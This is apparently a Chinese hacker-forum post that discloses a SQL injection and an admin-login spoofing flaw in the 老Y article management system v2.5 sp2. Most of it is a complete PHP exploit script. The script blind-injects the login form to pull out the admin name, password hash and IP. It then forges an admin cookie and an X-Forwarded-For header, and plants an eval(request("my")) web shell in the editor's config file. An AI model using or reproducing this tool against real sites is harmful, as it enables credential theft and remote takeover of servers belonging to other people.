作者:My5t3ry
老Y文章管理系统 v2.5 sp2的/user/UserLogin.asp文件存在一个SQL注射漏洞,导致恶意用户可以通过漏洞得到数据库的任何数据。另外后台登陆处理不当,导致通过伪造管理账号密码以及管理员IP即可欺骗登陆后台。
漏洞测试exp:
<?php
ini_set("max_execution_time",0);
error_reporting(7);
function usage()
{
global $argv;
exit(
"\n--+++============================================================+++--".
"\n--+++==== ".base64_decode("wM9ZzsTVwrncwO3Ptc2zdjIuNXNwMiBCbGluZCBTUUwgSW5qZWN0aW9uIEV4cGxvaXQ=")." ====+++--".
"\n--+++============================================================+++--".
"\n\n[+] Author : My5t3ry".
"\n[+] Team : http://www.t00ls.net".
"\n[+] Blog : http://www.bksec.net".
"\n[+] Usage : php ".$argv[0]." <hostname> <path>".
"\n[+] Ex. : php ".$argv[0]." localhost /".
"\n\n");
}
function query($pos, $chr, $chs)
{
switch ($chs){
case 1:
$query = "admin' or 1=1 and (select asc(mid(Admin_Name,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 2:
$query = "admin' or 1=1 and (select asc(mid(Admin_Pass,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 3:
$query = "admin' or 1=1 and (select len(Admin_Name) from [Yao_Admin] where id=1)={$pos} and '1'='1";
break;
case 4:
$query = "admin' or 1=1 and (select asc(mid(Admin_IP,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 5:
$query = "admin' or 1=1 and (select len(Admin_IP) from [Yao_Admin] where id=1)={$pos} and '1'='1";
break;
}
$query = urlencode($query);
return $query;
}
function exploit($hostname, $path, $pos, $chr, $chs)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);
if (!$conn){
exit("\r\n[-] No response from $conn");
}
$postdata = "Username=".query($pos, $chr, $chs)."&PassWord=aaaaaa&Submit=%B5%C7%C2%BC";
$message = "POST ".$path."User/Userlogin.asp?action=login HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Cookie: ASPSESSIONIDSSCTBRDD=ILJJFNOABJJHHDMPDBAEJIGC\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;
fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);
fclose($conn);
return $reply;
}
function crkusername($hostname, $path, $chs)
{
global $length,$user;
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$chr = 0;
$pos = 1;
echo "[+] username: ";
while ($pos <= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);
if (strlen(trim($match[1])) != 0)
{
$user .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}
function crkpassword($hostname, $path, $chs)
{
global $pass;
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 18)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);
if (strlen(trim($match[1])) != 0)
{
$pass .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}
function lengthcolumns($hostname, $path, $chs)
{
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit==0)
{
$response = exploit($hostname, $path, $pos, $chr, $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);
if (strlen(trim($match[1])) != 0)
{
$exit = 1;
$length = $pos;
}
else
$pos++;
if($pos==20)
exit("\r\n[+] Exploit Failed.\r\n");
}
return $length;
}
function crkadminip($hostname, $path, $chs)
{
global $iplength,$adminip;
$key = "1234567890.";
$chr = 0;
$pos = 1;
echo "[+] adminip: ";
while ($pos <= $iplength)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);
if (strlen(trim($match[1])) != 0)
{
$adminip .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}
function getshell($hostname, $path, $user, $pass, $adminip)
{
$conn = fsockopen($hostname, 80);
if (!$conn){
exit("\r\n[-] No response from $conn");
}
$postdata = "d_name=user&d_initmode=EDIT&d_fixwidth=&d_skin=light1&d_width=500&d_height=300&d_stateflag=1&d_sbedit=1&d_sbview=1&d_detectfromword=1&d_autoremote=0&d_showborder=0&d_entermode=1&d_areacssmode=0&d_memo=500px%BF%ED%B6%C8%BD%E7%C3%E6%CF%C2%B5%C4%D7%EE%BC%F2%B9%A4%BE%DF%C0%B8%B0%B4%C5%A5%2C%CA%CA%BA%CF%D3%DA%D3%CA%BC%FE%CF%B5%CD%B3%C1%F4%D1%D4%CF%B5%CD%B3%B5%C8%D6%BB%D0%E8%D7%EE%BC%F2%B5%A5%B9%A6%C4%DC%B5%C4%D3%A6%D3%C3&d_uploadobject=0&d_autodir=2&d_allowbrowse=0&d_cusdirflag=0&d_baseurl=1&d_uploaddir=..%2Fuploadfiles%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%22%3Aeval%28request%28%22my%22%29%29%27&d_imagesize=0&d_flashext=swf&d_flashsize=0&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=0&d_fileext=rar%7Czip%7Cpdf%7Cdoc%7Cxls%7Cppt%7Cchm%7Chlp&d_filesize=0&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=0&d_localext=gif%7Cjpg%7Cbmp%7Cwmz%7Cpng&d_localsize=0&d_sltsyobject=0&d_sltsyext=jpg%7Cjpeg&d_sltflag=0&d_sltminsize=300&d_sltoksize=120&d_sywzflag=0&d_sywzminwidth=100&d_sywzminheight=100&d_sytext=%B0%E6%C8%A8%CB%F9%D3%D0...&d_syfontcolor=000000&d_syshadowcolor=FFFFFF&d_syshadowoffset=1&d_syfontsize=12&d_syfontname=%CB%CE%CC%E5&d_sywzposition=1&d_sywzpaddingh=5&d_sywzpaddingv=5&d_sywztextwidth=66&d_sywztextheight=17&d_sytpflag=0&d_sytpminwidth=100&d_sytpminheight=100&d_sytpposition=1&d_sytppaddingh=5&d_sytppaddingv=5&d_sypicpath=&d_sytpopacity=1&d_sytpimagewidth=88&d_sytpimageheight=31";
$message = "POST ".$path."Admin/EditorAdmin/style.asp?action=StyleSetSave&id=2 HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "X-FORWARDED-FOR: ".$adminip."\r\n";
$message .= "Cookie: ASPSESSIONIDCADSSCQQ=OKLJGOECENDGHDLAKKIKBCAB; LaoYAdmin=UserName=".$user."&UserPass=".$pass."&UserID=1\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;
fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);
fclose($conn);
return $reply;
}
if ($argc != 3)
usage();
$hostname = $argv[1];
$path = $argv[2];
echo "[+] Len(username): ";
$length = lengthcolumns($hostname, $path, 3);
echo $length."\n";
echo "[+] Len(adminip): ";
$iplength = lengthcolumns($hostname, $path, 5);
echo $iplength."\n";
crkusername($hostname, $path, 1);
crkpassword($hostname, $path, 2);
crkadminip($hostname, $path, 4);
$reply = getshell($hostname, $path, $user, $pass, $adminip);
if(eregi(chr(209).chr(249).chr(202).chr(189).chr(208).chr(222).chr(184).chr(196).chr(179).chr(201).chr(185).chr(166),$reply))
{
echo "[+] Exploit finished.\r\n";
echo "[+] shell:http://".$hostname."/Editor/asp/config.asp?my=response.write(now())\r\n";
}
else
{
echo "[-] Exploit failed.\r\n";
}
?>
关于漏洞分析这里就先不写了,有一点需要注意的是获得webshell后记得到/Editor/asp/config.asp删除写进去的
|":eval(request("
my"))
'
[localfile=1]